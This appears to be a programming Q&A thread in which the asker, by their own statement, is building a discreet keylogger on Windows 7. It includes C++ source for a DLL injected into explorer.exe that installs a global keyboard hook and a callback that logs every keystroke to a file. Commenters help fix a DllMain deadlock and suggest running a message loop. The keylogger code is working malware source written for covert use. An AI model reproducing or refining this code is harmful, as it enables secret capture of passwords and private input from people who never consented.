# Infinite loop in a dll injected on explorer.exe

Tags: c++, windows, dll-injection

I'm trying to create a keylogger on windows 7. To do It, I have created a Dll (`setHook.dll`) that I inject in a new thread of explorer.exe. In this first DLL, I open an other dll which contains a function (`hookfunc`) called on each keyboard input.

I need to let my Dll works in background because if it dies, I lost my Hook function.
To do It, I have tried :

- `Sleep(INFINITE);` : works a moment but explorer.exe crash
- `while(1);` : works a moment but explorer.exe crash
- `system("pause")` : working ! But I don't want a console appears on the screen, my keylogger has to be discreet.
- `getchar()`: same as `system("pause")`;
- `system("pause > null");` : access denied
- `this_thread::sleep_for(chrono::seconds(10))` : explorer crash

**SetHook.dll :**

```
BOOL WINAPI  DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID)
{
    HMODULE dll;
    HOOKPROC addr;
    HHOOK handle;

    if (dwReason != DLL_PROCESS_ATTACH)
        return true;
    if (!(dll = LoadLibraryA("E:\\Projets\\Visual Studio 2013\\Projets\\inject\\x64\\Debug\\inject.dll")))
        return false;
    if (!(addr = (HOOKPROC)GetProcAddress(dll, "hookfunc")))
        return false;
    if (!(handle = SetWindowsHookEx(WH_KEYBOARD, addr, dll, 0)))
        return false;
    Sleep(INFINITE); //issue here
    return true;
}
```

**CallbackFunc :** (I don't think it can help)

```
LRESULT CALLBACK hookfunc(int code, WPARAM wParam, LPARAM lParam)
{
    std::ofstream file;
    WORD buf = 0;
    BYTE KeyState[256];
    file.open("E:\\function.txt", std::ofstream::out | std::ofstream::app);
    if (code >= 0 && KEYUP(lParam))
    {
        if (wParam == VK_RETURN)
            file << "[ENTER]";
        else
        {
            GetKeyboardState(KeyState);
            ToAscii(wParam, lParam, KeyState, &buf, 0);
            file << (char)buf;
        }
    }
    file.close();
    return (CallNextHookEx(NULL, code, wParam, lParam));
}
```

The code works, I just need a discreet infinite loop instead of Sleep(INFINITE). Any idea ?

Comment: You have to return from DllMain or the process will hang.  Returning from DllMain does not cause the DLL to be unloaded.

Answer (score 3, accepted):

Sleeping in DllMain is almost certainly a bad idea.

I assume you are trying to install a [global hook](http://msdn.microsoft.com/en-us/library/windows/desktop/ms644990(v=vs.85).aspx). To do this, you need to run the [message loop](http://msdn.microsoft.com/en-us/library/windows/desktop/ms644928(v=vs.85).aspx) in your injector application, i.e. something like:

```
while(GetMessage(&msg, NULL, 0, 0 ))
{ 
   TranslateMessage(&msg); 
   DispatchMessage(&msg); 
}
```

Comment: My injector application is this Dll. Am i forced to put all this code in the injector ? My goal by doing this was to not have a process running

Comment: How else would you load your code? Trick Explorer into loading your DLL?

Comment: It's the first time that I create a Dll. The fing is that I just understand how It's work and creating an infinite loop in a DllMain result in a DeadLock, I'm trying an other solution now, thanks for your help

Comment: Since the hook is being installed in the context of Explorer, which already has a message loop, I don't think you need to implement one yourself.

Comment: @HarryJohnston That is, if the installation of the hook is also done by Explorer. The documentation specifically mentions that global hooks must have the host app pump messages, or it may deadlock in some scenarios.

Comment: Yes, my reading of the OPs question is that the call to SetWindowsHookEx is in the DllMain function of the DLL that he's getting Explorer to load.  In the more usual scenario, where SetWindowsHookEx is being called from a separate executable, that executable does indeed need a message loop as you say.